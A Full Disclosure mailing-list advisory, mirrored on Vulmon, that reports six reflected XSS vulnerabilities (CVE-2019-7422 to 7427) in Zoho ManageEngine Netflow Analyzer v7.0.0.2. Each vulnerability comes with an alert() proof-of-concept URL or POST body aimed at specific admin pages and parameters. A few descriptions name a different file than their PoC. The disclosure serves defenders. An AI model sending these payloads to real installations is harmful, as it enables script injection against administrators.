Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

[CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone

Related Vulnerabilities: CVE-2019-7422   CVE-2019-7423   CVE-2019-7424   CVE-2019-7425   CVE-2019-7426   CVE-2019-7427   CVE-2009-3903  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#29">By Date</a>
<a href="25"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#29">By Thread</a>
<a href="25"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">[CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Rafael Pedrero &lt;rafael.pedrero () gmail com&gt;


<em>Date</em>: Wed, 6 Feb 2019 07:44:22 +0100


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7422
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/addMailSettings.jsp" file in the gF
parameter.


2. Proof of Concept

<a rel="nofollow" href="http://localhost:8080/netflow/jspui/addMailSettings.jsp?task=mail&amp;firstTime=true&amp;gF=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E">http://localhost:8080/netflow/jspui/addMailSettings.jsp?task=mail&amp;firstTime=true&amp;gF=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E</a>

Parameter
 gF


3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7423
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/editProfile.jsp" file in the
userName parameter.


2. Proof of Concept

<a rel="nofollow" href="http://localhost:8080/netflow/jspui/editProfile.jsp?userName=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E">http://localhost:8080/netflow/jspui/editProfile.jsp?userName=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E</a>

Parameter
 userName.


3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7424
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/index.jsp" file in the view GET
parameter or any of these POST parameters: autorefTime, section, snapshot,
viewOpt, viewAll, view, or groupSelName. The latter is related to
CVE-2009-3903.


2. Proof of Concept

<a rel="nofollow" href="http://localhost:8080/netflow/jspui/index.jsp?grID=-1&amp;view=%22%3E%3CSCRIPT%3Ealert">http://localhost:8080/netflow/jspui/index.jsp?grID=-1&amp;view=%22%3E%3CSCRIPT%3Ealert</a>(%22XSS%22);%3C/SCRIPT%3E&amp;grDisp=3

Parameter
 view

Via POST also is vulnerable with others parameters: autorefTime, section,
snapshot, viewOpt, viewAll, view and groupSelName.

3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7425
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the task parameter.


2. Proof of Concept

<a rel="nofollow" href="http://localhost:8080/netflow/jspui/linkdownalertConfig.jsp?task=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E&amp;first=true">http://localhost:8080/netflow/jspui/linkdownalertConfig.jsp?task=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E&amp;first=true</a>

Parameter
 task


3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7426
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the groupDesc, groupName, groupID, or task parameter.


2. Proof of Concept

POST <a rel="nofollow" href="http://localhost:8080/netflow/jspui/groupConfiguration.jsp">http://localhost:8080/netflow/jspui/groupConfiguration.jsp</a> HTTP/1.1

moveLR=&amp;moveRL=&amp;clickSub=true&amp;task=Add&amp;flag=false&amp;groupID=0&amp;groupName=ddd&amp;groupDesc=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&amp;Submit32222=Guardar

Parameter
 groupDesc, groupName, groupID and task


3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

&lt;!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Software Link: <a rel="nofollow" href="https://www.manageengine.com/products/netflow/?doc">https://www.manageengine.com/products/netflow/?doc</a>
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7427
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the autorefTime or graphTypes parameter.

2. Proof of Concept

POST <a rel="nofollow" href="http://localhost:8080/netflow/jspui/NetworkSnapShot.jsp">http://localhost:8080/netflow/jspui/NetworkSnapShot.jsp</a> HTTP/1.1

setPerio=&amp;firstTime=false&amp;graphTypes=line&amp;timeFrame=Today&amp;autorefTime=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E


Parameter
 autorefTime and graphTypes


3. Solution:

Update to last version this product.
Patch:
<a rel="nofollow" href="https://www.owasp.org/index.php/XSS_">https://www.owasp.org/index.php/XSS_</a>(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


--&gt;

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#29">By Date</a>
<a href="25"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#29">By Thread</a>
<a href="25"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>[CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone</strong> <em>Rafael Pedrero (Feb 08)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started